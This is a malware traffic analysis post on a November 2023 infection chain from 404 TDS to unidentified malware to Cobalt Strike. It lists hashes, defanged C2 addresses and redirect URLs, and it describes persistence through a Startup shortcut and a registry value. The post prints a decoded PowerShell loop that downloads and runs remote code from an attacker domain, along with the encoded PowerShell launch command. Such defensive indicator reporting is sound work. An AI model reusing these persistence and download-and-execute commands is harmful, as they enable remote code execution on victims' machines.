Malware-Traffic-Analysis.net - 2023-11-06 - 404 TDS --> unidentified malware --> Cobalt Strike

2023-11-06 (MONDAY) - 404 TDS --> UNIDENTIFIED MALWARE --> COBALT STRIKE

NOTICE:

Of note, the zip archives on this page have been updated, and they now use the new password scheme. For the new password, see the "about" page of this website.

ASSOCIATED FILES:

2023-11-06-IOCs-from-404TDS-to-malware-to-CobaltStrike.txt.zip 2.0 kB (2,007 bytes)
2023-11-06-404TDS-to-malware-to-Cobalt-Strike.pcap.zip 4.9 kB (4,865,381 bytes)
2023-11-06-404TDS-unidentified-malware-and-artifacts.zip 166 kB (167,417 bytes)

2023-11-06 (MONDAY) - 404 TDS --> UNIDENTIFIED MALWARE --> COBALT STRIKE

NOTES:

- Unidentified malware from 404 TDS distribution today.

INFECTION CHAIN:

- URL --> 404 TDS chain --> .js file --> initial C2 --> follow-up C2 --> Cobalt Strike

ASSOCIATED MALWARE:

- SHA256 hash: cf40754a3dc7d536b455086f349f9d7445bc4bcd01b6718bd800a80d6f9dca95
- File size: 2,439 bytes
- File name: KPUW1359_2087960.js
- File type: ASCII text, with very long lines (945)
- File description: .js file downloaded from 404 TDS link

- SHA256 hash: d09c7908c39e2a3255811722903d37df6bf7a2083958abff5ded2732f412047e
- File size: 318,464 bytes
- File location: hxxp[:]//170.130.165[.]37/RClient.dll
- Saved location: C:\Users\Public\sdriver.dll
- File type: PE32+ executable (DLL) (console) x86-64, for MS Windows
- File description: 64-bit DLL for unidentified malware
- Run method: unknown

PERSISTENCE:

- Description: Windows shortcut in Start Menu's Startup directory
- Location: C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
- Shortcut: %windir%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -Exec -nop -enc 
  (Get-ItemProperty -Path 'HKCU:\Software\Classes\msslnooo' -Name t).t

REGISTRY UPDATE:

- Key: HKEY_CURRENT_USER\SOFTWARE\Classes\msslnooo
- Value 0
- Value Name: t
- Value Type: REG_SZ
- Value Data: [base64 string]
- Decoded base64 string: while($true){IEX(New-Object Net.WebClient).DownloadString("
  hxxp[:]//ftroftrodro[.]top:80/debug/fBTRdJs="); Start-Sleep -s 3600}
- Note: No traffic seen to ftroftrodro[.]top, but it resolved to 170.130.165[.]37 when pinged

OTHER ARTIFACTS:

- SHA256 hash: 7e347a488aa085b1939d86488a6d204d0782604c9fad56731054da789b27edeb
- File size: 467 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\w1.js

- SHA256 hash: 746756065971e5168ecaeb5507aa6c449bbb88e90bb3537be4a470299a0679aa
- File size: 289 bytes
- File location: C:\Users\[username]\AppData\Local\Temp\w2.js

INFECTION TRAFFIC:

REDIRECT PATH TO INITIAL .JS FILE DOWNLOAD:

- port 443 - hxxps[:]//truckjeepsuvparts[.]com/7b4/88ooy4cpn4j
- port 443 - hxxps[:]//tradembs[.]com/wgaj4w
- port 443 - hxxps[:]//medilabr[.]com/wnmwhg/

INITIAL C2:

- 170.130.55[.]46 port 80 - 170.130.55[.]46 - POST /

FOLLOW-UP C2:

- 170.130.55[.]117 port 8080 - TLSv1.2 HTTPS traffic, self-signed certificate
- 170.130.55[.]117 port 443 - TCP traffic, not encrypted, but with plain text and base64 strings

FOLLOW-UP REMOTE ACCESS MALWARE:

- 170.130.165[.]37 port 80 - 170.130.165[.]37 - GET /RClient.dll
- 170.130.165[.]107 port 1444 - TCP traffic

COBALT STRIKE:

- 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /ah
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /jquery-3.3.1.min.js
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /jquery-3.3.1.slim.min.js
- 170.130.55[.]150 port 80 - 170.130.55[.]150 - POST /jquery-3.3.2.min.js?__cfduid=[18 or 19 character base64 text]

TRAFFIC FROM THE INFECTED HOST TO THE DOMAIN CONTROLLER:

- [victim's internal IP address] port 5985 - [domain controller]:5985 - POST /wsman?PSVersion=5.1.19041.3570

Click here to return to the main page.